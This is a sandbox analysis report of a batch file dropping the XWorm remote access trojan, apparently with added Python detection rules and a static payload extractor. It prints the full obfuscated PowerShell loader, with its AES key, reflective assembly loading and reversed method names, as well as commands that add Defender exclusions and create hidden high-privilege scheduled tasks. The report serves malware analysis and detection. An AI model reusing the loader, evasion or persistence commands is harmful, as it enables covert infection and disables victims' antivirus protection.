Analysis

  • max time kernel
    122s
  • max time network
    121s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    30-05-2024 15:06

General

  • Target

    APK_Installer.bat

  • Size

    302KB

  • MD5

    7a5f5944302b8298714b56ae2f138b7c

  • SHA1

    669b42f2f6e76895899d84d5ad7a12f23d951f13

  • SHA256

    3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552

  • SHA512

    73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120

  • SSDEEP

    6144:32i9XCwjujllYECVvYOjntEw8ZNsT0oilQHSzlO8DF8hVvRj:32iBCwyhCVlaJZUilQHulOq2vRj

Malware Config

Extracted

Family

xworm

C2

19.ip.gl.ply.gg:38173

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Runtime Broker.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Runs PowerShell with its console window hidden (-windowstyle hidden) and the execution policy bypassed (-ep bypass).

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    schtasks.exe is often used by malware for persistence or post-infection execution; here it registers a task that relaunches Runtime Broker.exe from the user profile every minute at the highest run level.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 29 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
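The behaviours listed above reduce to a handful of process-creation checks. What follows is an added example written for this page, not part of the sandbox report or of any vendor's detection content: rule logic run over process records modelled on the command lines recorded in the Processes section (the loader command line shortened to its distinguishing markers). The record schema (pid, ppid, image, cmdline), the rule names and the ATT&CK mapping are this example's own assumptions; fill the records from Sysmon Event ID 1 or EDR process telemetry.

```python
"""Added example, not part of the sandbox report: detection logic for the
behaviours listed under Signatures, run over process-creation records modelled
on the command lines in the Processes section.  The record schema (pid, ppid,
image, cmdline) is an assumption; fill it from Sysmon Event ID 1 or EDR
process telemetry."""
import re

HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS = re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)
# Reflective load, or the reversed-string trick ('daoL'[-1..-4] -join '') that hides method names
REFLECT = re.compile(r"System\.Reflection\.Assembly|\[-1\.\.-\d+\]\s*-join", re.I)
EXCLUSION = re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)", re.I)
TASK = re.compile(r"schtasks\b.*/create|Register-ScheduledTask", re.I)
USER_PATH = re.compile(r"\\Users\\", re.I)
# Legitimate Windows process names that malware borrows; compared with spaces removed
SYSTEM_NAMES = {"runtimebroker.exe", "svchost.exe", "csrss.exe", "lsass.exe", "dllhost.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def image_name(rec):
    return rec["image"].rsplit("\\", 1)[-1].lower()


def ancestors(by_pid, pid):
    """Walk ppid links upwards; stop at unknown parents or a cycle."""
    chain, seen = [], {pid}
    parent = by_pid.get(by_pid[pid]["ppid"])
    while parent is not None and parent["pid"] not in seen:
        chain.append(parent)
        seen.add(parent["pid"])
        parent = by_pid.get(parent["ppid"])
    return chain


# (rule name, ATT&CK technique, predicate over a record and its ancestor chain)
RULES = [
    ("powershell-hidden-bypass", "T1059.001", lambda r, c:
        image_name(r) == "powershell.exe"
        and bool(HIDDEN.search(r["cmdline"]) and BYPASS.search(r["cmdline"]))),
    ("reflective-assembly-load", "T1620", lambda r, c:
        image_name(r) == "powershell.exe" and bool(REFLECT.search(r["cmdline"]))),
    ("defender-exclusion-added", "T1562.001", lambda r, c:
        bool(EXCLUSION.search(r["cmdline"]))),
    ("scheduled-task-user-path", "T1053.005", lambda r, c:
        bool(TASK.search(r["cmdline"]) and USER_PATH.search(r["cmdline"]))),
    ("system-name-outside-windows", "T1036.005", lambda r, c:
        image_name(r).replace(" ", "") in SYSTEM_NAMES
        and not r["image"].lower().startswith("c:\\windows\\")),
    ("script-host-ancestor", "T1059.005", lambda r, c:
        image_name(r) == "powershell.exe"
        and any(image_name(a) in SCRIPT_HOSTS for a in c)),
]


def scan(records):
    """Return {pid: [(rule, technique), ...]} for every record that fires at least one rule."""
    by_pid = {r["pid"]: r for r in records}
    hits = {}
    for r in records:
        fired = [(name, ttp) for name, ttp, pred in RULES if pred(r, ancestors(by_pid, r["pid"]))]
        if fired:
            hits[r["pid"]] = fired
    return hits


def rec(pid, ppid, image, cmdline):
    return {"pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed records: command lines from the report, the loader shortened to its markers ("...")
LOADER = r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); ... } function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}"""
SAMPLE = [
    rec(876, None, r"C:\Windows\system32\cmd.exe",
        r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat"'),
    rec(536, 876, PS, LOADER),
    rec(4940, 536, PS, r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_837_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_837.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force"""),
    rec(1440, 536, r"C:\Windows\System32\WScript.exe",
        r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_837.vbs"'),
    rec(3404, 1440, r"C:\Windows\system32\cmd.exe",
        r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_837.bat" "'),
    rec(3760, 3404, PS, LOADER),
    rec(1112, 3760, PS, r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'"""),
    rec(4584, 3760, r"C:\Windows\System32\schtasks.exe",
        r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"'),
    rec(1716, None, r"C:\Users\Admin\Runtime Broker.exe", r'"C:\Users\Admin\Runtime Broker.exe"'),
    rec(2152, None, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'),
    rec(3452, None, r"C:\Windows\system32\svchost.exe",
        r"C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc"),
]

if __name__ == "__main__":
    for pid, fired in scan(SAMPLE).items():
        print(pid, ", ".join(f"{n} ({t})" for n, t in fired))
```

The ancestry walk is what separates the second loader run from the first: the copy started by WScript.exe via the Roaming .bat, and the Add-MpPreference children it spawns, carry a script host in their parent chain, while the Chrome and svchost records in the same tree fire nothing. The masquerading rule keys on the image path, so the dropped Runtime Broker.exe in the user profile is flagged while the real one under C:\Windows is not.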

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:876
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:536
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_837_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_837.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4940
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_837.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1440
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_837.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3404
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_837.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_837.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3760
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1112
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4804
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:868
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3280
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
              6⤵
              • Creates scheduled task(s)
              PID:4584
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2152
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff0c24ab58,0x7fff0c24ab68,0x7fff0c24ab78
      2⤵
      PID:1220
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1576 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:2
      2⤵
      PID:2448
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
      2⤵
      PID:1864
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2188 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
      2⤵
      PID:1944
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
      2⤵
      PID:3852
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3188 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
      2⤵
      PID:2000
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4152 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
      2⤵
      PID:2788
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4292 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
      2⤵
      PID:3200
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3988 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
      2⤵
      PID:5004
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4552 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
      2⤵
      PID:2156
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4600 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
      2⤵
      PID:3480
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
      2⤵
      PID:1464
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4624 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
      2⤵
      PID:4060
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3408 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
      2⤵
      PID:4124
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3296 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
      2⤵
      PID:1500
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3436 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
      2⤵
      PID:1368
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
      2⤵
      PID:1916
  • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
    1⤵
    PID:2908
  • C:\Users\Admin\Runtime Broker.exe
    "C:\Users\Admin\Runtime Broker.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:1716
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004D4
    1⤵
    PID:4704
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
    1⤵
    PID:3452
  • C:\Users\Admin\Runtime Broker.exe
    "C:\Users\Admin\Runtime Broker.exe"
    1⤵
    • Executes dropped EXE
    PID:332
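The two identical PowerShell command lines in the tree above are the loader. It reads the .bat it was launched from, takes the first line beginning `:: ` (a batch comment, so cmd.exe never executes it), splits that line on `\`, and for each part Base64-decodes, AES-CBC-decrypts with the key and IV that are hard-coded as Base64 literals, GZip-decompresses and hands the result to Assembly.Load followed by EntryPoint.Invoke. Method names such as FromBase64String, Load and ReadAllText are stored backwards and rebuilt with `[-1..-N] -join ''` so they never appear literally. Because the key and IV sit in the command line, the embedded stages can be recovered statically. The script below is an added example written for this page, not code from the report or from the malware author: it undoes the reversed-string trick, pulls the key and IV, and extracts the stages from a batch file without executing it. It assumes the `cryptography` package is installed for the AES step, and the batch file it builds to exercise itself is constructed here, not the one from the report.

```python
"""Added example, not part of the sandbox report: static extractor for the batch
loader in the Processes section.  The loader reads its own .bat, takes the first
line beginning ':: ', splits it on backslash, and for each part does Base64
decode -> AES-CBC decrypt (key and IV are Base64 literals in the command line)
-> GZip decompress -> Assembly.Load.  This does the same on disk without running
anything.  Assumptions: the 'cryptography' package is installed for AES; the
sample batch file built below is constructed here, not the one from the report."""
import base64
import gzip
import re

try:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    HAVE_AES = True
except ImportError:  # parsing still works without it; decryption does not
    HAVE_AES = False

# ('gnirtS46esaBmorF'[-1..-16] -join '') indexes the string from its end and re-joins the
# characters: FromBase64String is stored backwards so it never appears literally.
REVERSED = re.compile(r"::\('([^']+)'\[-1\.\.-(\d+)\] -join ''\)")
# Excerpt of the report's loader command line (only the parts this script needs)
LOADER_EXCERPT = (
    "$aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')"
    "('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); "
    "$aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); "
    "$HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); "
    "$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\\Users\\Admin\\AppData\\Local\\Temp\\APK_Installer.bat')"
)


def deobfuscate(cmdline):
    """Replace each reversed-string method lookup with the plain method name."""
    return REVERSED.sub(lambda m: "::" + m.group(1)[::-1][:int(m.group(2))], cmdline)


def key_iv(cmdline):
    """Recover the AES key and IV bytes from the (deobfuscated) loader command line."""
    text = deobfuscate(cmdline)

    def grab(field):
        return re.search(r"\." + field + r"=\[System\.Convert\]::FromBase64String\('([^']+)'\)", text).group(1)

    return base64.b64decode(grab("Key")), base64.b64decode(grab("IV"))


def carrier_blobs(bat_text):
    """Mirror the loader: first ':: ' line, marker dropped, split on backslash (never valid Base64)."""
    for line in bat_text.splitlines():
        if line.startswith(":: "):
            return [base64.b64decode(part) for part in line[3:].split("\\")]
    raise ValueError("no ':: ' carrier line found")


def _cipher(key, iv):
    if not HAVE_AES:
        raise RuntimeError("AES step needs the 'cryptography' package")
    return Cipher(algorithms.AES(key), modes.CBC(iv))


def aes_cbc_decrypt(key, iv, data):
    dec = _cipher(key, iv).decryptor()
    padded = dec.update(data) + dec.finalize()
    n = padded[-1]  # PKCS7: last byte is the pad length and every pad byte equals it
    if not 1 <= n <= 16 or padded[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS7 padding: wrong key/IV or truncated blob")
    return padded[:-n]


def extract_payloads(bat_text, cmdline):
    """Return the decrypted, decompressed stages in carrier order (index 0 runs first)."""
    key, iv = key_iv(cmdline)
    return [gzip.decompress(aes_cbc_decrypt(key, iv, blob)) for blob in carrier_blobs(bat_text)]


# Constructed sample: the inverse pipeline, so the extractor can be exercised offline
def aes_cbc_encrypt(key, iv, data):
    n = 16 - len(data) % 16
    enc = _cipher(key, iv).encryptor()
    return enc.update(data + bytes([n]) * n) + enc.finalize()


def build_sample_bat(key, iv, payloads):
    """Lay stages out as the loader expects: gzip -> AES-CBC -> Base64, backslash-joined on a ':: ' line."""
    blobs = [base64.b64encode(aes_cbc_encrypt(key, iv, gzip.compress(p))).decode() for p in payloads]
    return "@echo off\r\n:: " + "\\".join(blobs) + "\r\nrem launcher lines omitted\r\n"


def roundtrip(stages, cmdline=LOADER_EXCERPT):
    """Build a constructed carrier with the loader's own key/IV and extract it again."""
    key, iv = key_iv(cmdline)
    return extract_payloads(build_sample_bat(key, iv, stages), cmdline)


if __name__ == "__main__":
    print(deobfuscate(LOADER_EXCERPT))
    key, iv = key_iv(LOADER_EXCERPT)
    print(f"AES-{len(key) * 8} key, {len(iv)}-byte IV")
    if HAVE_AES:
        for i, stage in enumerate(roundtrip([b"MZ stage one (constructed)", b"stage two (constructed)"])):
            print(i, len(stage), stage[:2])
```

Against the real sample, `extract_payloads(open(path).read(), cmdline)` yields two blobs; the loader invokes the first with no arguments and the second with an empty string array, and both go through Assembly.Load, so each should start with an MZ header. A padding error from `aes_cbc_decrypt` means the key or IV was taken from a different build of the loader than the one that wrote the carrier line, since the key and IV here are AES-256 (32-byte) and 16-byte values pulled from the command line rather than derived.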

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
    Filesize 2KB
    MD5 376049a960407231a4d4755454e56f89
    SHA1 a76c8ac786093e51a8c3772601b52be563be985f
    SHA256 257fdc20af0236c9eeba61c2647bd950eb26dea400a2d267b50be7d70cf4615c
